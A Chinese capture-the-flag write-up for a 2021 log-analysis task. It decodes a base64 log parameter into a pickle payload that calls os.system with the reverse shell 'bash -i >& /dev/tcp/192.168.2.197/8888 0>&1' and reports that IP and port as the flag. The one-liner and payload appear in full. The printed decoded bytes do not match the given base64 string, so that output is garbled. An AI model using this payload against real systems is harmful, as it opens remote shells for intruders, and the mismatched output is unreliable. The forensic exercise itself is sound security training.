[陇剑杯 2021]简单日志分析（问3）

圆肖2025-10-02 13:31

1. 提取最后一条 base64

最后一条日志的 user 参数值为：

text

复制代码

STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4=

2. Base64 解码

python

复制代码

import base64

payload = "STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4="
decoded = base64.b64decode(payload)
print(decoded)

输出：

text

复制代码

b'I\x0c0\x0c0S\'bash -i >& /dev/tcp/192.168.2.197/8888 0>&1\'\nw1\n0(g0\nlp2\n0(I0\ntp3\n0(g3\nI0\ndp4\n0cos\nsystem\np5\n0g5\n(g1\ntR.'

可以看到里面明明白白地出现了：

text

复制代码

bash -i >& /dev/tcp/192.168.2.197/8888 0>&1

3. 结论

反弹 shell 的目标 IP 和端口是：

text

复制代码

192.168.2.197:8888

最终答案：

text

复制代码

192.168.2.197:8888
NSSCTF{192.168.2.197:8888}